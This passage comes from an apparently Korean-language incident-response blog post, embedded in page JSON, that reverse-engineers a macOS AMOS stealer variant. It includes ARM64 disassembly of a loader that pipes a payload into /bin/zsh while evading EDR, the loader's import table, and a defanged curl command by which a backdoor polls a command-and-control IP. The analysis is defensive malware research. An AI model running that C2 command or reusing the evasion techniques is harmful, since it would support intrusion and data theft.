pointer\n100000a10:  sub x23,x23,x22        ; reduce remaining count\n100000a14:  cbnz x23,0x1000009d4   ; loop until done\n",[578,14885,14883],{"__ignoreMap":530},[526,14887,14888,14889,14892,14893,14896,14897,14900,14901,14904],{},"청크 크기 공식 ",[578,14890,14891],{},"(remaining_length % 192) + 64","는 남은 페이로드 길이에 따라 write 호출당 64에서 255바이트 사이의 값을 만들어냅니다. 이 가변 쓰기 패턴은 ",[578,14894,14895],{},"ktrace","나 ",[578,14898,14899],{},"dtrace"," 같은 커널 이벤트 추적 도구에는 보이지만, 인식 가능한 고정 크기 시그니처를 만들지는 않습니다. 동일한 페이로드를 실행할 때마다 서로 다른 ",[578,14902,14903],{},"write()"," 시스템 호출 크기 시퀀스가 생성됩니다.",[526,14906,14907,14908,14910],{},"청크 사이의 1마이크로초 ",[578,14909,13634],{},"은 두 번째 목적을 지닙니다. 쓰기 작업 사이에 CPU를 양보하여 CPU 사용률을 낮게 유지하고, 행위 기반 EDR 규칙이 비정상적인 버스트 I/O로 표시할 수 있는 갑작스러운 급증을 피합니다.",[888,14912,14914],{"id":14913},"_4단계-즉각적인-메모리-정리","4단계: 즉각적인 메모리 정리",[526,14916,894],{},[853,14918,14919],{"style":13126},[615,14920,14923],{"className":14921,"code":14922,"language":620},[618],"; After all chunks written and pipe closed:\n100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type\n100000a24:  sxtb w9,w8\n100000a28:  ldp x10,x11,[x19]\n100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer\n100000a34:  csel x1,x11,x8,lt      ; length of buffer\n100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)\n",[578,14924,14922],{"__ignoreMap":530},[526,14926,14927,14930],{},[578,14928,14929],{},"_bzero()"," 호출은 파이프에 대한 마지막 쓰기 직후 복호화된 페이로드 버퍼 전체를 0으로 만듭니다. 실행이 끝난 뒤 복호화된 페이로드가 메모리에 남아 있는 시간 창은 단 1마이크로초도 없습니다. 이 함수가 반환된 직후 생성된 라이브 메모리 덤프는 페이로드가 있던 자리에서 오직 0만 발견합니다.",[526,14932,7014,14933,14936],{},[567,14934,14935],{},"zero-after-use","라고 하며, 이는 키 자료가 메모리에 남지 않도록 고보안 암호 라이브러리가 사용하는 것과 동일한 기법입니다. 이런 기법이 상용(commodity) 멀웨어에 등장하는 것은 이례적이며, 보안 엔지니어링 배경을 가진 개발자를 시사합니다.",[888,14938,14940],{"id":14939},"전체-실행-시퀀스","전체 실행 시퀀스:",[526,14942,894],{},[853,14944,14945],{"style":13126},[615,14946,14949],{"className":14947,"code":14948,"language":620},[618],"__cstring:  \"\\x01LG@\\x01T]F\"   (7 bytes, obfuscated)\n    ↓  SIMD XOR with 0x2e (8-wide vector)\nstack:      \"/bin/zsh\\0\"         (decoded in-place, stack only)\n    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]\n    ↓  _fork()\n    │\n    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end\n    │          _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n    │          → /bin/zsh reads commands from stdin (= pipe)\n    │\n    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n                     _usleep(1)\n               _close(local_5c)    close write end → EOF to shell\n               _bzero(payload, len) ← WIPE IMMEDIATELY\n               _waitpid(child, ...)\n",[578,14950,14948],{"__ignoreMap":530},[740,14952,14954],{"id":14953},"무기가-된-임포트-테이블","무기가 된 임포트 테이블",[526,14956,746],{},[526,14958,14959],{},"이 바이너리의 전체 임포트 테이블:",[853,14961,14962],{"style":13126},[615,14963,14966],{"className":14964,"code":14965,"language":620},[618],"// C runtime / memory\n_memcpy       _memmove      _memset       _bzero\n\n// Process execution\n_fork         _execvp       _execl        __exit\n\n// IPC / pipes\n_pipe         _dup2         _close        _write\n\n// Synchronisation\n_waitpid      _usleep\n\n// Stack protection\n___stack_chk_fail    ___stack_chk_guard\n\n// C++ runtime\noperator.new    operator.delete    __Unwind_Resume\n___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch\n___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0\nterminate    logic_error    bad_array_new_length    __next_prime\n\n// STL containers\nappend    reserve    push_back    operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[578,14967,14965],{"__ignoreMap":530},[526,14969,14970],{},"총 27개의 심볼입니다. 무엇이 빠져 있는지가 무엇이 있는지 못지않게 많은 것을 말해 줍니다.",[888,14972,14974],{"id":14973},"부재-네트워크","부재: 네트워크",[526,14976,894],{},[853,14978,14979],{"style":13126},[615,14980,14983],{"className":14981,"code":14982,"language":620},[618],"socket      connect     bind        listen\naccept      send        recv        sendto\nrecvfrom    getaddrinfo gethostbyname\n",[578,14984,14982],{"__ignoreMap":530},[888,14986,14988],{"id":14987},"부재-파일-시스템","부재: 파일 시스템",[526,14990,894],{},[853,14992,14993],{"style":13126},[615,14994,14997],{"className":14995,"code":14996,"language":620},[618],"open        read        fopen       fread\nfwrite      fclose      stat        unlink\nmkdir       rename      opendir     readdir\n",[578,14998,14996],{"__ignoreMap":530},[888,15000,15002],{"id":15001},"부재-프로세스-인트로스펙션","부재: 프로세스 인트로스펙션",[526,15004,894],{},[853,15006,15007],{"style":13126},[615,15008,15011],{"className":15009,"code":15010,"language":620},[618],"getpid      getuid      getenv      sysctl\n",[578,15012,15010],{"__ignoreMap":530},[888,15014,15016],{"id":15015},"부재-암호화","부재: 암호화",[526,15018,746],{},[853,15020,15021],{"style":13126},[615,15022,15025],{"className":15023,"code":15024,"language":620},[618],"CCCrypt     SecItemAdd  SecKeychainFind\n",[578,15026,15024],{"__ignoreMap":530},[526,15028,15029,15030,646,15033,15036,15037,646,15040,15043],{},"전통적인 멀웨어 샘플이라면 네트워크 임포트(",[578,15031,15032],{},"socket",[578,15034,15035],{},"connect",")나 파일 임포트(",[578,15038,15039],{},"fopen",[578,15041,15042],{},"write",")를 기대하게 됩니다. 이 바이너리에는 그런 것이 단 하나도 없습니다. 표준 스캐너에게 이 바이너리는 무해한 프로세스 실행기(launcher)처럼 보이며, 이는 의도된 것입니다. 정적 분석 도구를 헛돌게 만드는 의도적인 아키텍처 결정입니다.",[526,15045,15046,15048],{},[578,15047,13452],{}," 바이너리는 탈취를 직접 수행하지 않습니다. 그 유일한 목적은 실제 악성 페이로드, 즉 강하게 난독화된 AppleScript를 내려놓고 실행하는 것입니다. 악성 바이너리를 찾는 EDR이나 AV는 여기서 네트워크나 파일 I/O가 없는 로더를 보게 되고, 이 바이너리가 고수준 스크립트 페이로드를 위한 특화된 전달 시스템이라는 사실을 인식하지 못한 채 깨끗한 것으로 분류할 수 있습니다.",[13095,15050],{},[557,15052,15053],{"id":15053},"백도어",[526,15055,562],{},[526,15057,15058,15059,15062],{},"이 인시던트는 최초 침해 이후에도 끝나지 않았습니다. Microsoft Defender 텔레메트리는 ",[578,15060,15061],{},"/Users/\u003Credacted>/.mainhelper","에서 실행되며 외부 서버를 조회하는 프로세스를 보여주었습니다:",[853,15064,15065],{"style":13126},[615,15066,15068],{"className":2782,"code":15067,"language":2784,"meta":530,"style":530},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[578,15069,15070],{"__ignoreMap":530},[1706,15071,15072,15075,15077],{"class":1708,"line":1709},[1706,15073,15074],{"class":2791},"sh",[1706,15076,13332],{"class":2799},[1706,15078,15079],{"class":2795}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[526,15081,15082],{},"이 Base64 문자열은 16바이트 기기 UUID로 디코딩되었는데, 이는 공격자의 C2 인프라가 최초 감염일에 이 기기에 할당한 고유 식별자였습니다.",[526,15084,15085,15088,15089,15092,15093,15095],{},[578,15086,15087],{},".mainhelper"," 바이너리(SHA-256: ",[578,15090,15091],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",")는 인시던트 당일 osascript 드로퍼가 ",[578,15094,13329],{},"를 통해 설치한 것이었습니다.",[13095,15097],{},[557,15099,15101],{"id":15100},"집단-방패의-힘-우리의-shared-threat-intelligence-플랫폼","집단 방패의 힘: 우리의 Shared Threat Intelligence 플랫폼",[526,15103,562],{},[526,15105,15106],{},"우리 SOC에서 알림이 발생하면, 시계는 해당 고객뿐 아니라 glueckkanja의 보호막 아래에 있는 모든 조직을 위해 돌아가기 시작합니다. 문서화되지 않은 이 AMOS 변종에 대한 조사는 인텔리전스 갭이 현실에서 무엇을 의미하는지 분명히 보여줍니다. 전통적인 공급업체가 위협을 아직 본 적이 없기에 눈이 먼 채로 있는 위험한 시간 창 말입니다.",[526,15108,15109],{},"바로 이 지점에서 glueckkanja CSOC 고객을 위해 독점적으로 개발된 우리의 독자적 Shared Threat Intelligence Platform이 그 가치를 드러냅니다. 우리는 업계 업데이트를 기다리지 않습니다. 우리가 그것을 만듭니다. 우리 분석가들이 아직 ARM64 어셈블리의 마지막 계층을 해체하는 동안, 우리의 Automated Orchestration Engine은 이미 추출된 지표를 우리 생태계 전반에 배포하고 있었습니다. 이것이 집단 면역(herd immunity)을 만들어냅니다. 단 하나의 엔드포인트에서 발견된 것이 몇 분 안에 우리 보호 아래에 있는 모든 조직에 대해 차단된 위협이 됩니다.",[526,15111,15112],{},"반응형 보안은 기존 방어 메커니즘의 틈새를 겨냥해 빠져나가는 위협에는 통하지 않습니다. 해답은 인간의 전문성을, 그 지식을 즉시 그리고 확장 가능하게 활용하는 아키텍처와 결합하는 데 있습니다. 우리의 공유 인텔리전스 모델을 통해 공격자의 시간적 우위는 역전됩니다. 우리 고객은 위협이 업계에 인식되기도 전에 이미 보호받고 있습니다.",[847,15114,15115,15120,15123,15126],{},[526,15116,15117],{},[567,15118,15119],{},"개인정보 보호 안내",[526,15121,15122],{},"이 발행물에서는 식별 정보를 익명 처리했습니다. 특정 기술적 세부사항, 지표, 타임스탬프는 분석의 기술적 무결성을 해치지 않으면서 영향을 받은 환경의 지속적인 보호를 보장하기 위해 일부 변경되었을 수 있습니다.",[526,15124,15125],{},"이 보고서의 기술적 분석과 침해 지표(IOC)는 오로지 정보 제공 및 교육 목적을 위한 것입니다. 이는 최선의 지식에 근거해 제공됩니다. glueckkanja AG는 완전성이나 정확성에 관해 명시적이든 묵시적이든 어떠한 보증도 하지 않으며, 여기서 공유된 정보, 규칙, 시그니처의 사용으로 발생하는 손해, 손실, 보안 사고에 대해 책임지지 않습니다. 모든 지표와 규칙은 실제 사용 전에 통제된 환경에서 검증할 것을 권장합니다.",[526,15127,15128],{},"여기서 기술된 지표와 기법은 알려진 멀웨어 패밀리와 겹칠 수 있으며, 단일 캠페인에만 배타적으로 귀속되지 않습니다.",[12804,15130,15131],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":530,"searchDepth":531,"depth":531,"links":15133},[15134,15135,15136,15137,15144,15145,15146,15147,15155,15162],{"id":13117,"depth":531,"text":13118},{"id":13152,"depth":531,"text":13153},{"id":13209,"depth":531,"text":13210},{"id":13241,"depth":531,"text":13242,"children":15138},[15139,15140,15141,15142,15143],{"id":13250,"depth":2091,"text":13251},{"id":13264,"depth":2091,"text":13265},{"id":13278,"depth":2091,"text":13279},{"id":13287,"depth":2091,"text":13288},{"id":13304,"depth":2091,"text":13305},{"id":13459,"depth":531,"text":13460},{"id":13537,"depth":531,"text":13538},{"id":13649,"depth":531,"text":13650},{"id":13714,"depth":531,"text":13715,"children":15148},[15149,15150,15151,15152,15153,15154],{"id":13729,"depth":2091,"text":13730},{"id":14014,"depth":2091,"text":14015},{"id":14269,"depth":2091,"text":14270},{"id":14455,"depth":2091,"text":14456},{"id":14542,"depth":2091,"text":14543},{"id":14693,"depth":2091,"text":14694},{"id":14747,"depth":531,"text":14748,"children":15156},[15157,15158,15159,15160,15161],{"id":14763,"depth":2091,"text":14764},{"id":14829,"depth":2091,"text":14830},{"id":14871,"depth":2091,"text":14872},{"id":14913,"depth":2091,"text":14914},{"id":14939,"depth":2091,"text":14940},{"id":14953,"depth":531,"text":14954,"children":15163},[15164,15165,15166,15167],{"id":14973,"depth":2091,"text":14974},{"id":14987,"depth":2091,"text":14988},{"id":15001,"depth":2091,"text":15002},{"id":15015,"depth":2091,"text":15016},{"lang":12954,"seoTitle":15169,"titleClass":12956,"date":15170,"categories":15171,"blogtitlepic":15172,"socialimg":15173,"customExcerpt":15174,"keywords":15175,"maxContent":325,"asideNav":15176,"footer":15191,"contactInContent":15192,"published":325},"AMOS 스틸러 변종: 알려지지 않은 macOS 멀웨어 리버스 엔지니어링","2026-04-10",[12959],"head-amos-stealer.png","/blog/heads/head-amos-stealer.png","지금까지 문서화되지 않은 AMOS 스틸러 변종이 macOS 엔드포인트를 침해했습니다. 알려진 해시도, 공개 데이터베이스의 C2 데이터도 없었습니다. 우리 SOC는 여섯 겹의 난독화 계층을 해체하고 모든 지표를 추출한 뒤, 업계가 이 샘플을 미처 보기도 전에 몇 시간 만에 모든 SOC 고객에게 보호를 배포했습니다.","AMOS Stealer, macOS 멀웨어, 리버스 엔지니어링, 멀웨어 분석, Ghidra, ARM64, 인시던트 대응, 위협 인텔리전스, CSOC, macOS 보안, 스틸러 멀웨어, Shared Threat Intelligence, Atomic macOS Stealer",{"menuItems":15177},[15178,15181,15183,15186,15188],{"href":15179,"text":15180},"#사건-알려지지-않은-ioc-시나리오","사건",{"href":15182,"text":13118},"#_1단계-샌드박스-점검",{"href":15184,"text":15185},"#_2단계-helper-바이너리-리버스-엔지니어링","2단계: 바이너리 분석",{"href":15187,"text":15053},"#백도어",{"href":15189,"text":15190},"#집단-방패의-힘-우리의-shared-threat-intelligence-플랫폼","Shared Threat Intelligence",{"noMargin":325},{"quote":325,"infos":15193},{"bgColor":15194,"headline":15195,"subline":15196,"level":740,"textStyling":13022,"flush":13023,"person":15197,"form":15203},"var(--color-gk-dark-blue)","문의하기","우리의 Shared Threat Intelligence Platform이 업계가 알아차리기도 전에 알려지지 않은 멀웨어 변종으로부터 여러분을 어떻게 보호하는지 궁금하신가요? 저희에게 연락 주세요.",{"image":15198,"cloudinary":325,"alt":15199,"name":15200,"quotee":15200,"quoteeTitle":15201,"quote":15202},"/people/people-jan-geisbauer-csoc.jpg","glueckkanja의 Head of Security Jan Geisbauer의 인물 사진","Jan Geisbauer","Head of Security","이 변종에서 위험했던 것은 기술적 복잡성이 아니었습니다. 물론 그것도 인상적이지만 말입니다. 위험했던 것은 시간 창이었습니다. Shared Threat Intelligence가 없었다면, 우리가 아직 분석하는 동안 다른 고객들은 몇 시간이나 무방비로 노출되어 있었을 것입니다.",{"ctaText":15204,"cta":15205,"method":12952,"action":13040,"fields":15206},"Absenden",{"skin":13039},[15207,15208,15209,15210,15211,15215,15217,15219,15222,15224,15225,15226],{"type":13043,"id":13044,"value":13045},{"label":13047,"type":620,"id":13048,"required":325,"requiredMsg":13049},{"label":13051,"type":620,"id":403,"required":325,"requiredMsg":13052},{"label":13054,"type":13055,"id":13055,"required":325,"requiredMsg":13056},{"label":15212,"type":15213,"id":10700,"required":484,"requiredMsg":15214},"저희에게 남길 메시지","textarea","메시지를 입력해 주세요.",{"label":15216,"type":13059,"id":13060,"required":325,"requiredMsg":13061},"여러분의 데이터는 문의 처리 및 답변을 위해 저희가 저장합니다. 개인정보 보호에 관한 자세한 내용은 \u003Ca href=\"/ko/privacy\">개인정보 처리방침\u003C/a>에서 확인하실 수 있습니다.",{"type":13043,"id":15218,"value":12959},"_topic",{"type":13043,"id":15220,"value":15221},"_location","World",{"type":13043,"id":13063,"value":15223},"Form: Blog AMOS Stealer CSOC | KO",{"type":13043,"id":13066,"value":13067},{"type":13043,"id":13069},{"type":13043,"id":15227},"jsonData","/posts/2026-04-10-incident-to-intelligence",{"title":13081,"description":13087},"posts/2026-04-10-incident-to-intelligence",[13075,15232,15233,15234,13076],"Incident Response","macOS Security","Malware Analysis","b9n3SJkIvvGpKX91FirNMbOf09tasxhiNIyMFeJje8I",[],{"id":15238,"extension":15239,"meta":15240,"stem":8,"__hash__":15245},"authors_data/authors.json","json",{"Pascal Asch":15241},{"display_name":521,"avatar":15242,"permalink":15243,"linkedin":547,"imageOffsetTop":15244},"people/Pascal.Asch.648.jpg","/authors/pascal-asch","66%","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383986463]